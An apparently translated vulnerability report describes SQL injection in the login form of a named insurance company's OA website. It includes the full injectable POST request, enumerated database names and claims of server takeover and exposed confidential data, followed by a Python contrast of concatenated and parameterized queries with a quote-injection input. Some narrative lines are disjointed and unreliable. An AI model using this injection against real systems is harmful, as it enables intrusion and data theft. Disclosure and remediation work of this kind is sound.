A website vulnerability in Great Wall insurance (resulting in leakage of a large amount of confidential information)
Similar to previously reported vulnerabilities on this site, but in a different location, so this is not a duplicate report.
http://oa.ccib.com.cn/login.asp
POST injection on the login page:
POST /LoginType.asp HTTP/1.1
Host: oa.ccib.com.cn
Content-Length: 70
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://oa.ccib.com.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) hrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://oa.ccib.com.cn/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: ASPSESSIONIDASBSDCBR=DDIJGEODBIEDENPJDPPBLKPM

Digest=&urlFrom=&username=admin&password=admin&submit1=+%B5%C7+%C2%BC+
The username parameter is injectable.
Six databases: not used
available databases [6]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
It appears the server itself can be taken over directly.
We can see that the main site is also hosted on this server, so the main site is compromised as well.
There was no data in the database, but an unexpected error occurred:
When I opened my computer, I found that Baidu cloud exists. By default, I opened it directly:
Apart from users' personal information, everything there is confidential enterprise information.
So far, no data has been obtained.
Solution:
20rank ~~~
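
The injectable username field in the login POST above, shown as a concatenated lookup beside a parameterized one. This is an added example, not code from the original report or from the affected site. It assumes an in-memory SQLite table in place of the site's ASP/SQL Server back end, and the table layout, function names, and sample credential are hypothetical.

```python
import hashlib, hmac, os, sqlite3
from urllib.parse import parse_qs

PW = "constructed-pw"  # constructed sample credential, not from the report

def hash_pw(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    # Hypothetical user table; the real OA schema is not shown on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)", ("admin", salt, hash_pw(PW, salt)))
    return db

def parse_login_body(body):
    # Field names follow the captured POST body; latin-1 keeps the non-UTF-8
    # bytes of submit1 intact instead of replacing them.
    form = parse_qs(body, keep_blank_values=True, encoding="latin-1")
    return form.get("username", [""])[0], form.get("password", [""])[0]

def lookup_vulnerable(db, body):
    # 'Before': the username is concatenated into the SQL text, so a quote
    # in the POST field changes the structure of the statement.
    user, _ = parse_login_body(body)
    sql = "SELECT username FROM users WHERE username = '" + user + "'"
    return db.execute(sql).fetchone()

def login_hardened(db, body):
    # 'After': the value is bound as a parameter and is never parsed as SQL.
    user, pw = parse_login_body(body)
    row = db.execute("SELECT salt, pw FROM users WHERE username = ?", (user,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(hash_pw(pw, row[0]), row[1])

# Constructed inputs: the page's body shape, and a value carrying quotes.
NORMAL = "Digest=&urlFrom=&username=admin&password=" + PW + "&submit1=+%B5%C7+%C2%BC+"
QUOTED = "Digest=&urlFrom=&username=x%27+OR+%271%27%3D%271&password=x"
```

With the concatenated query, the quoted value matches a row even though no such user exists, and a harmless name containing an apostrophe raises a SQL syntax error. The bound parameter treats both as plain strings.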